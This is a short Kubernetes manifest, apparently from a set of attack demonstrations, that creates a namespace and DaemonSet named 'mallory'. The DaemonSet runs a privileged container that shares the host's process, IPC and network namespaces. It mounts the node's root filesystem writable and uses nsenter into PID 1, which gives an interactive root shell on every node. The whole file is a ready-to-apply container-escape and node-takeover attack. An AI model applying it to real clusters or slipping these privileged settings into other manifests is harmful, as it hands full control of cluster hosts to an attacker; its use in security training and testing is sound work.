06-priv-daemonset-nsenter.yaml
apiVersion: v1
kind: Namespace
metadata:
  name: mallory  
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: mallory
  namespace: mallory
  labels:
    k8s-app: mallory
spec:
  selector:
    matchLabels:
      name: mallory
  template:
    metadata:
      labels:
        name: mallory
    spec:
      hostPID: true
      hostIPC: true
      hostNetwork: true
      containers:
      - name: mallory
        image: debian:buster-slim
        command: ["nsenter"]
        args: ["--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--"]
        stdin: true
        tty: true
        volumeMounts:
        - name: host
          mountPath: /host
          readOnly: false
        securityContext:
          privileged: true
      volumes:
      - name: host
        hostPath:
          path: /
